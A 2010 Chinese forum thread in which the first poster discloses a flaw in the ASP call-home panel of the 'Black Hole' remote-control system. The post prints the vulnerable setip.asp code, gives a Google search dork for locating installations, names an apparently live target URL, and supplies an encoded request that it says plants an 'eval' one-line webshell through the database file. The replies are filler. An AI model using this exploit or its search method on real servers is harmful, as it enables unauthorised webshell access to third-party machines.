黑洞的ASP上线系统的一个漏洞申请加精!

社区服务
高级搜索
猴岛论坛电脑百科黑洞的ASP上线系统的一个漏洞申请加精!
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
3个回复

黑洞的ASP上线系统的一个漏洞申请加精!

楼层直达
ヤ - 男妓

ZxID:11045950

等级: 贵宾
配偶: 温柔虐。
只要是女的,你敢嫁,我就敢娶。

举报 只看楼主 使用道具 楼主   发表于: 2010-03-04 0
漏洞描述:

在默认的情况下,利用该漏洞可得到上线系统所在服务器的webshell

ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp

写入配置时对参数未作检查,setip.asp相关代码

<% strIP=Trim(Request.QueryString("Ip")) strPort=Trim(Request.QueryString("Port")) strType=Trim(Request.QueryString("Type")) if strType="0" then strIP=Request.ServerVariables("REMOTE_HOST") end if sql="select * from Info where strMark='Main'" rs.Open sql,conn,1,3 if not rs.eof or not rs.bof then rs("strIPAddress")=strIP rs("strPort")=strPort rs("strType")=strType rs.update '不要修改下面的反馈字符.否则程序不知道是否更新成功. response.write "update success!" else response.write "update fail!" end if set rs=nothing conn.close set conn=nothing 以“inurl:setip.asp”为关键字找了一个测试地址http://zomei.com/blackhole/setip.asp

提交
http://zomei.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7

这样就插入了EVAL一句话
被人嘲笑的梦想,就越有实现的价值。
゛蝣蕩啲龍っ

ZxID:7865773

等级: 元老
‘燕鸥’是种水鸟,听说,它们会从几千里外,飞回自己的家,而且,是‘情有独钟’,终身不换伴侣 ..

举报 只看该作者 沙发   发表于: 2010-03-04 0
先抢个沙发再看
ヤ - 男妓

ZxID:11045950

等级: 贵宾
配偶: 温柔虐。
只要是女的,你敢嫁,我就敢娶。

举报 只看该作者 板凳   发表于: 2010-03-04 0
我的板凳 。
被人嘲笑的梦想,就越有实现的价值。
灬耦尒維鎂

ZxID:11022106

等级: 准尉
世上最痛苦的是不是醉生梦死,而是睡着了不知道是怎么死的
举报 只看该作者 地板   发表于: 2010-03-04 0
我的地板
哥不好抽烟,但是哥好抽极品烟
« 返回列表
发帖 回复